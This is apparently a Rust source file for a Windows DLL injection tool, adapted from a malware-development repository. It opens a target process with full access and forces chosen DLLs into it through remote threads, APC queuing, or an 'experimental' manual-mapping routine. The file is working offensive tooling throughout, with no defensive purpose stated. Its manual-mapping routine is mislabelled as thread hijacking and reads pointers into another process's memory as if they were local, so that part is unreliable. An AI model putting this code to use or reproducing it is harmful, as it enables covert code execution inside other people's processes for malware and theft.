/*
    DLL Injector [Enhanced Version]
    Author: @5mukx
*/

use std::env::args;
use std::ffi::CString;
use std::fs::File;
use std::io::Read;
use std::ptr::null_mut;
use winapi::ctypes::c_void;
use winapi::shared::basetsd::ULONG_PTR;
use winapi::shared::minwindef::FALSE;
use winapi::shared::ntdef::NULL;
use winapi::shared::winerror::WAIT_TIMEOUT;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress, LoadLibraryA};
use winapi::um::memoryapi::{ReadProcessMemory, VirtualAllocEx, VirtualFreeEx, WriteProcessMemory};

use winapi::um::processthreadsapi::{
    CreateRemoteThread, GetExitCodeThread, OpenProcess, OpenThread, QueueUserAPC,
    TerminateThread,
};

use winapi::um::synchapi::WaitForSingleObject;

use winapi::um::tlhelp32::{
    CreateToolhelp32Snapshot, Module32First, Module32Next, Process32First, Process32Next,
    Thread32First, Thread32Next, MODULEENTRY32, PROCESSENTRY32, TH32CS_SNAPMODULE,
    TH32CS_SNAPPROCESS, TH32CS_SNAPTHREAD, THREADENTRY32,
};

use winapi::um::winnt::{
    IMAGE_BASE_RELOCATION, IMAGE_DOS_HEADER,
    IMAGE_IMPORT_BY_NAME, IMAGE_IMPORT_DESCRIPTOR, IMAGE_NT_HEADERS64, IMAGE_ORDINAL_FLAG64,
    IMAGE_SECTION_HEADER, MEM_COMMIT, MEM_RELEASE, MEM_RESERVE, PAGE_EXECUTE_READWRITE,
    PAGE_READWRITE, PROCESS_ALL_ACCESS, THREAD_SET_CONTEXT,
};

const INVALID_HANDLE_VALUE: *mut c_void = -1isize as *mut c_void;

macro_rules! log {
    ($level:expr, $msg:expr) => {{
        let color = match $level {
            "DEBUG" => "\x1b[94m", // Blue
            "INFO" => "\x1b[32m",  // Green
            "WARN" => "\x1b[33m",  // Yellow
            "ERROR" => "\x1b[31m", // Red
            _ => "\x1b[0m",        // Reset
        };
        match $level {
            "DEBUG" => println!("{}[DEBUG] {}\x1b[0m", color, $msg),
            "INFO" => println!("{}[INFO] {}\x1b[0m", color, $msg),
            "WARN" => println!("{}[WARN] {}\x1b[0m", color, $msg),
            "ERROR" => println!("{}[ERROR] {}\x1b[0m", color, $msg),
            _ => println!("{}{}\x1b[0m", color, $msg),
        }
    }};
}

// Source: https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Malware_Tips/find_pid_by_name.rs
unsafe fn get_pid(process_name: &str) -> u32 {
    let mut pe: PROCESSENTRY32 = std::mem::zeroed();
    pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as u32;

    let snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if snap.is_null() {
        log!(
            "ERROR",
            format!(
                "Error while snapshoting processes: Error {}",
                GetLastError()
            )
        );
        std::process::exit(0);
    }

    let mut pid = 0;

    let mut result = Process32First(snap, &mut pe) != 0;

    while result {
        let exe_file = CString::from_vec_unchecked(
            pe.szExeFile
                .iter()
                .map(|&file| file as u8)
                .take_while(|&c| c != 0)
                .collect::<Vec<u8>>(),
        );

        if exe_file.to_str().unwrap() == process_name {
            pid = pe.th32ProcessID;
            break;
        }
        result = Process32Next(snap, &mut pe) != 0;
    }

    if pid == 0 {
        log!(
            "ERROR",
            format!(
                "Unable to get PID for {}: PROCESS DOESNT EXISTS",
                process_name
            )
        );
        std::process::exit(0);
    }

    CloseHandle(snap);
    pid
}

unsafe fn is_module_loaded(pid: u32, dll_path: &str) -> bool {

    let snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);
    if snapshot == INVALID_HANDLE_VALUE {
        log!("ERROR", "Failed to create module snapshot");
        return false;
    }

    let mut module_entry: MODULEENTRY32 = std::mem::zeroed();
    module_entry.dwSize = std::mem::size_of::<MODULEENTRY32>() as u32;

    if Module32First(snapshot, &mut module_entry) == FALSE {
        CloseHandle(snapshot);
        log!("ERROR", "Failed to get first module");
        return false;
    }

    let dll_name = std::path::Path::new(dll_path)
        .file_name()
        .unwrap()
        .to_str()
        .unwrap()
        .to_lowercase();

    loop {
        let module_name = std::ffi::CStr::from_ptr(module_entry.szModule.as_ptr())
            .to_str()
            .unwrap()
            .to_lowercase();
        if module_name == dll_name {
            CloseHandle(snapshot);
            return true;
        }
        if Module32Next(snapshot, &mut module_entry) == FALSE {
            break;
        }
    }

    CloseHandle(snapshot);
    false
}

unsafe fn inject_dll(process: *mut c_void, dll_path: &str, method: &str, pid: u32) -> bool {
    let dll_path_cstr = match CString::new(dll_path) {
        Ok(path) => path,
        Err(_) => {
            log!(
                "ERROR",
                format!("Failed to convert DLL path '{}' to CString", dll_path)
            );
            return false;
        }
    };

    let dllsize = dll_path.len();

    let buffer = VirtualAllocEx(
        process,
        null_mut(),
        dllsize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE,
    );
    if buffer.is_null() {
        log!(
            "ERROR",
            format!("Failed to allocate buffer: Error Code {}", GetLastError())
        );
        return false;
    }

    let write_process = WriteProcessMemory(
        process,
        buffer,
        dll_path_cstr.as_ptr() as *const c_void,
        dllsize,
        null_mut(),
    );
    if write_process == 0 {
        log!(
            "ERROR",
            format!(
                "Failed to write DLL path to process memory: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    let kernel32 = GetModuleHandleA("kernel32.dll\0".as_ptr() as *const _);
    if kernel32.is_null() {
        log!(
            "ERROR",
            format!(
                "Failed to get handle to kernel32.dll: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    let load_library_addr = GetProcAddress(kernel32, "LoadLibraryA\0".as_ptr() as *const _);

    if load_library_addr.is_null() {
        log!(
            "ERROR",
            format!(
                "Failed to get address of LoadLibraryA: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    let success = if method == "CRT" {
        let thread = CreateRemoteThread(
            process,
            null_mut(),
            0,
            Some(std::mem::transmute(load_library_addr)),
            buffer,
            0,
            null_mut(),
        );
        if thread.is_null() {
            log!(
                "ERROR",
                format!(
                    "Failed to create remote thread: Error Code {}",
                    GetLastError()
                )
            );
            VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
            return false;
        }

        let wait_result = WaitForSingleObject(thread, 20000);
        if wait_result == WAIT_TIMEOUT {
            log!(
                "WARN",
                "Timeout waiting for thread to complete, terminating it"
            );
            TerminateThread(thread, 0);
        }

        let mut exit_code = 0;
        GetExitCodeThread(thread, &mut exit_code);
        if exit_code == 0x00000103 {
            log!("INFO", "Thread still active, terminating it");
            TerminateThread(thread, 0);
        }

        CloseHandle(thread);
        true
    } else if method == "APC" {
        let snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, pid);
        if snapshot == INVALID_HANDLE_VALUE {
            log!("ERROR", "Failed to create thread snapshot for APC");
            VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
            return false;
        }

        let mut thread_entry: THREADENTRY32 = std::mem::zeroed();
        thread_entry.dwSize = std::mem::size_of::<THREADENTRY32>() as u32;

        let mut thread_ids: Vec<u32> = Vec::new();

        if Thread32First(snapshot, &mut thread_entry) != 0 {
            loop {
                if thread_entry.th32OwnerProcessID == pid {
                    thread_ids.push(thread_entry.th32ThreadID);
                }
                if Thread32Next(snapshot, &mut thread_entry) == 0 {
                    break;
                }
            }
        }

        CloseHandle(snapshot);

        for thread_id in thread_ids {
            let thread_handle = OpenThread(THREAD_SET_CONTEXT, 0, thread_id);
            if thread_handle.is_null() {
                log!(
                    "WARN",
                    format!(
                        "Failed to open thread {}: Error Code {}",
                        thread_id,
                        GetLastError()
                    )
                );
                continue;
            }

            let apc_result = QueueUserAPC(
                Some(std::mem::transmute(load_library_addr)),
                thread_handle,
                buffer as ULONG_PTR,
            );
            if apc_result == 0 {
                log!(
                    "WARN",
                    format!(
                        "Failed to queue APC for thread {}: Error Code {}",
                        thread_id,
                        GetLastError()
                    )
                );
            }
            CloseHandle(thread_handle);
        }

        std::thread::sleep(std::time::Duration::from_secs(2));
        true
    } else if method == "TH" {
        let thread_inject_success = thread_hijack_inject(process, dll_path, pid);

        if thread_inject_success {
            return true;
        }

        return false;
    } else {
        log!("ERROR", format!("Unknown injection method: {}", method));
        false
    };

    VirtualFreeEx(process, buffer, 0, MEM_RELEASE);

    if success && is_module_loaded(pid, dll_path) {
        log!(
            "INFO",
            format!("DLL '{}' successfully loaded into process", dll_path)
        );
    } else if success {
        log!(
            "WARN",
            format!(
                "DLL '{}' not found in process modules after injection",
                dll_path
            )
        );
    }

    success
}

// newly added test -> hijack injection ! experimental !

unsafe fn thread_hijack_inject(process: *mut c_void, dll_path: &str, _pid: u32) -> bool {

    let mut file = match File::open(dll_path) {
        Ok(f) => f,
        Err(_) => {
            log!("ERROR", format!("Failed to open DLL: {}", dll_path));
            return false;
        }
    };
    let mut dll_data = Vec::new();
    if file.read_to_end(&mut dll_data).is_err() {
        log!("ERROR", format!("Failed to read DLL: {}", dll_path));
        return false;
    }

    if dll_data.len() < std::mem::size_of::<IMAGE_DOS_HEADER>() {
        log!("ERROR", "DLL too small for DOS header");
        return false;
    }
    let dos_header = &*(dll_data.as_ptr() as *const IMAGE_DOS_HEADER);
    if dos_header.e_magic != winapi::um::winnt::IMAGE_DOS_SIGNATURE {
        log!("ERROR", "Invalid DOS signature");
        return false;
    }
    if dos_header.e_lfanew as usize >= dll_data.len() {
        log!("ERROR", "Invalid e_lfanew");
        return false;
    }
    let nt_headers = &*((dll_data.as_ptr() as usize + dos_header.e_lfanew as usize)
        as *const IMAGE_NT_HEADERS64);
    if nt_headers.Signature != winapi::um::winnt::IMAGE_NT_SIGNATURE {
        log!("ERROR", "Invalid NT signature");
        return false;
    }

    // Step 3: Allocate memory
    let image_size = nt_headers.OptionalHeader.SizeOfImage as usize;
    let image_base = VirtualAllocEx(
        process,
        null_mut(),
        image_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE,
    );
    if image_base.is_null() {
        log!(
            "ERROR",
            format!("Failed to allocate memory: Error {}", GetLastError())
        );
        return false;
    }

    let headers_size = nt_headers.OptionalHeader.SizeOfHeaders as usize;

    if headers_size > dll_data.len() {
        log!("ERROR", "Headers size exceeds DLL data");
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }
    if WriteProcessMemory(
        process,
        image_base,
        dll_data.as_ptr() as *const c_void,
        headers_size,
        null_mut(),
    ) == 0
    {
        log!(
            "ERROR",
            format!("Failed to write headers: Error {}", GetLastError())
        );
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }

    let section_header = (nt_headers as *const _ as usize
        + std::mem::size_of::<IMAGE_NT_HEADERS64>())
        as *const IMAGE_SECTION_HEADER;

    for i in 0..nt_headers.FileHeader.NumberOfSections as isize {
        let section = &*section_header.offset(i);
        if section.SizeOfRawData > 0 {
            if section.PointerToRawData as usize + section.SizeOfRawData as usize > dll_data.len() {
                log!("ERROR", format!("Section {} raw data out of bounds", i));
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let section_dest =
                (image_base as usize + section.VirtualAddress as usize) as *mut c_void;
            if section.VirtualAddress as usize + section.SizeOfRawData as usize > image_size {
                log!("ERROR", format!("Section {} exceeds image size", i));
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let section_src =
                (dll_data.as_ptr() as usize + section.PointerToRawData as usize) as *const c_void;
            if WriteProcessMemory(
                process,
                section_dest,
                section_src,
                section.SizeOfRawData as usize,
                null_mut(),
            ) == 0
            {
                log!(
                    "ERROR",
                    format!("Failed to write section {}: Error {}", i, GetLastError())
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
        }
    }

    let delta = (image_base as isize - nt_headers.OptionalHeader.ImageBase as isize) as i64;

    if delta != 0 {
        let reloc_dir = &nt_headers.OptionalHeader.DataDirectory[5];
        if reloc_dir.Size > 0 {
            let mut reloc_base = (image_base as usize + reloc_dir.VirtualAddress as usize)
                as *mut IMAGE_BASE_RELOCATION;
            let mut reloc_offset = 0;
            while reloc_offset < reloc_dir.Size {
                let reloc = &*reloc_base;
                if reloc.VirtualAddress == 0 || reloc.SizeOfBlock == 0 {
                    break;
                }
                let num_entries =
                    (reloc.SizeOfBlock - std::mem::size_of::<IMAGE_BASE_RELOCATION>() as u32) / 2;
                let entries = (reloc_base as usize + std::mem::size_of::<IMAGE_BASE_RELOCATION>())
                    as *mut u16;
                for i in 0..num_entries as isize {
                    let entry = *entries.offset(i);
                    let reloc_type = entry >> 12;
                    let offset = (entry & 0xFFF) as u32;
                    if reloc_type == 10 {
                        // IMAGE_REL_BASED_DIR64
                        let reloc_addr = (image_base as usize
                            + reloc.VirtualAddress as usize
                            + offset as usize) as *mut u64;
                        if reloc.VirtualAddress as usize + offset as usize >= image_size {
                            log!("ERROR", "Relocation out of bounds");
                            VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                            return false;
                        }
                        let value = *reloc_addr; // Read first to ensure memory is accessible
                        *reloc_addr = value + delta as u64;
                    }
                }
                reloc_offset += reloc.SizeOfBlock;
                reloc_base = (reloc_base as usize + reloc.SizeOfBlock as usize)
                    as *mut IMAGE_BASE_RELOCATION;
            }
        }
    }

    let import_dir = &nt_headers.OptionalHeader.DataDirectory[1];
    if import_dir.Size > 0 {
        
        let mut import_desc = (image_base as usize + import_dir.VirtualAddress as usize)
            as *mut IMAGE_IMPORT_DESCRIPTOR;
        while (*import_desc).Name != 0 {
            if (*import_desc).Name as usize >= image_size {
                log!("ERROR", "Import descriptor name out of bounds");
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let dll_name_ptr = (image_base as usize + (*import_desc).Name as usize) as *mut c_void;
            let dll_name_size = libc::strlen(dll_name_ptr as *const i8) + 1;
            let mut dll_name_vec = vec![0u8; dll_name_size];

            if ReadProcessMemory(
                process,
                dll_name_ptr,
                dll_name_vec.as_mut_ptr() as *mut c_void,
                dll_name_size,
                null_mut(),
            ) == 0
            {
                log!(
                    "ERROR",
                    format!("Failed to read DLL name: Error {}", GetLastError())
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let dll_name = CString::new(dll_name_vec).unwrap();
            let dll_handle = LoadLibraryA(dll_name.as_ptr());
            if dll_handle.is_null() {
                log!(
                    "ERROR",
                    format!(
                        "Failed to load DLL {:?}: Error {}",
                        dll_name,
                        GetLastError()
                    )
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let mut thunk = (image_base as usize + (*import_desc).FirstThunk as usize) as *mut u64;
            let mut orig_thunk = if *(*import_desc).u.Characteristics() != 0 {
                (image_base as usize + *(*import_desc).u.Characteristics() as usize) as *mut u64
            } else {
                thunk
            };
            while *orig_thunk != 0 {
                let func_addr = if *orig_thunk & IMAGE_ORDINAL_FLAG64 != 0 {
                    GetProcAddress(dll_handle, (*orig_thunk & 0xFFFF) as *const i8)
                } else {
                    let import_by_name =
                        (image_base as usize + *orig_thunk as usize) as *mut IMAGE_IMPORT_BY_NAME;
                    if (*import_by_name).Name.as_ptr() as usize - image_base as usize >= image_size
                    {
                        log!("ERROR", "Import name out of bounds");
                        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                        return false;
                    }
                    let func_name_ptr = (*import_by_name).Name.as_ptr() as *mut c_void;
                    let func_name_size = libc::strlen(func_name_ptr as *const i8) + 1;
                    let mut func_name_vec = vec![0u8; func_name_size];
                    if ReadProcessMemory(
                        process,
                        func_name_ptr,
                        func_name_vec.as_mut_ptr() as *mut c_void,
                        func_name_size,
                        null_mut(),
                    ) == 0
                    {
                        log!(
                            "ERROR",
                            format!("Failed to read function name: Error {}", GetLastError())
                        );
                        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                        return false;
                    }
                    let func_name = CString::new(func_name_vec).unwrap();
                    GetProcAddress(dll_handle, func_name.as_ptr())
                };
                if func_addr.is_null() {
                    log!(
                        "ERROR",
                        format!("Failed to resolve import: Error {}", GetLastError())
                    );
                    VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                    return false;
                }
                if WriteProcessMemory(
                    process,
                    thunk as *mut c_void,
                    &func_addr as *const _ as *const c_void,
                    std::mem::size_of::<u64>(),
                    null_mut(),
                ) == 0
                {
                    log!(
                        "ERROR",
                        format!("Failed to write import thunk: Error {}", GetLastError())
                    );
                    VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                    return false;
                }
                thunk = thunk.offset(1);
                orig_thunk = orig_thunk.offset(1);
            }
            import_desc = import_desc.offset(1);
        }
    }

    let entry_point = if nt_headers.OptionalHeader.AddressOfEntryPoint != 0 {
        (image_base as usize + nt_headers.OptionalHeader.AddressOfEntryPoint as usize)
            as *mut c_void
    } else {
        log!("WARN", "No entry point, DLL mapped but not executed");
        return true;
    };
    let thread = CreateRemoteThread(
        process,
        null_mut(),
        0,
        Some(std::mem::transmute(entry_point)),
        image_base as *mut c_void, // hModule for DllMain
        0,
        null_mut(),
    );
    if thread.is_null() {
        log!(
            "ERROR",
            format!("Failed to create remote thread: Error {}", GetLastError())
        );
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }
    WaitForSingleObject(thread, 10000); 
    CloseHandle(thread);

    log!(
        "INFO",
        format!("DLL '{}' injected at {:p}", dll_path, image_base)
    );
    true
}

fn main() {
    let args: Vec<String> = args().collect();
    if args.len() < 3 {
        log!(
            "ERROR",
            "Usage: dll_inject.exe <Process Name> <DLL Path 1> [DLL Path 2] ... [--method CRT|APC|TH]"
        );
        return;
    }

    let mut method = "CRT";
    let mut dll_paths = Vec::new();
    let mut process_name = "";

    for (i, arg) in args.iter().enumerate() {
        if i == 1 {
            process_name = arg;
        } else if arg == "--method" {
            if i + 1 < args.len() {
                method = &args[i + 1];
                if method != "CRT" && method != "APC" && method != "TH" {
                    log!("ERROR", "Invalid method specified. Use CRT, APC or TH");
                    return;
                }
            } else {
                log!("ERROR", "Missing method argument after --method");
                return;
            }
        } else if i > 1 && !arg.starts_with("--") && (i == 0 || args[i - 1] != "--method") {
            dll_paths.push(arg.clone());
        }
    }

    if dll_paths.is_empty() {
        log!("ERROR", "No DLL paths provided");
        return;
    }

    unsafe {
        let pid = get_pid(process_name);
        log!(
            "INFO",
            format!("Found PID {} for process '{}'", pid, process_name)
        );

        let process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
        if process == NULL {
            let error_code = GetLastError();
            match error_code {
                5 => log!("ERROR", "Access denied. Try running as administrator."),
                87 => log!("ERROR", "Invalid PID or process does not exist."),
                _ => log!(
                    "ERROR",
                    format!("Failed to open process: Error Code {}", error_code)
                ),
            }
            return;
        }

        log!(
            "INFO",
            format!("Opened process {} with handle {:?}", pid, process)
        );

        for dll_path in &dll_paths {
            log!("INFO", format!("Attempting to inject DLL: {}", dll_path));
            if inject_dll(process, dll_path, method, pid) {
                log!("INFO", format!("Injection completed for DLL: {}", dll_path));
            } else {
                log!("ERROR", format!("Failed to inject DLL: {}", dll_path));
            }
        }

        CloseHandle(process);
    }
}
